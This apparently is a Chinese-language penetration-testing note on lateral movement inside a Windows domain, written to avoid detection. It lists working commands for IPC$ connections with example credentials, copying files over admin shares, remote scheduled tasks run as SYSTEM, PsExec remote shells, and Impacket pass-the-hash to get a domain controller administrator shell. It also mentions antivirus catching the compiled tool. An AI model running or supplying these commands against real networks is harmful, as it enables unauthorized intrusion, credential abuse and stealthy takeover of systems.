在內(nèi)網(wǎng)滲透時(shí)，如果登錄遠(yuǎn)程桌面，容易暴露自己，所以還是盡可能使用命令行操作比較好

建立ipc連接
net use \\[ip] /u:[域名][用戶(hù)] [密碼]

例：net use \\192.168.83.10 /u:TEST\Administrator Iamtest123

net use 查看建立的ipc連接

net use \\192.168.83.10 /de /y 刪除ipc連接

net view \\192.168.83.10 查看共享了哪些磁盤(pán)

dir \\192.168.83.10\c$\ 查看c盤(pán)目錄

copy xxxx \\192.168.83.2\c$\ 上傳文件到c盤(pán)

copy \\192.168.83.2\c$\xxx c:\ 下載文件到c盤(pán)

利用schtasks計(jì)劃任務(wù)執(zhí)行命令(不需要先創(chuàng)立ipc連接)

創(chuàng)建計(jì)劃任務(wù)

schtasks /create /tn 任務(wù)名 /U 域\域用戶(hù) /P 域用戶(hù)密碼 /tr 執(zhí)行的命令或bat路徑 /sc ONSTART /s 域機(jī)子IP /RU system

執(zhí)行計(jì)劃任務(wù)

schtasks /run /tn 任務(wù)名 /s 域機(jī)子IP /U 域\域用戶(hù) /P 域用戶(hù)密碼

刪除計(jì)劃任務(wù)

schtasks /F /delete /tn 任務(wù)名 /s 域機(jī)子IP /U 域\域用戶(hù) /P 域用戶(hù)密碼

PsExec

下載地址：https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec
https://github.com/Al1ex/smbexec/releases
首先需要?jiǎng)?chuàng)建ipc連接
執(zhí)行命令PsExec.exe \\192.168.83.10 -s cmd.exe -accepteula，然后等待一段時(shí)間，彈回shell

hash傳遞

另外我上篇抓取密碼的文章中提到可以抓取密碼的hash，我們可以通過(guò)該工具實(shí)現(xiàn)NTLM hash的傳遞
下載地址：https://github.com/SecureAuthCorp/impacket
上面的psexec.exe是微軟的，并沒(méi)有hash傳遞的功能
將Impacket中examples目錄下的psexec.py用pyinstaller編譯一下（編譯完后有概率會(huì)被殺掉），生成psexec.exe文件
上傳到服務(wù)器，使用命令：psexec.exe -hashes :xxxxxxxxxxxxxx TEST/Administrator@192.168.83.10獲得域控管理員的shell

退出還會(huì)清掉文件

不好的就是中文會(huì)亂碼

Impacket套件參考文章：http://www.secwk.com/2019/10/13/10518/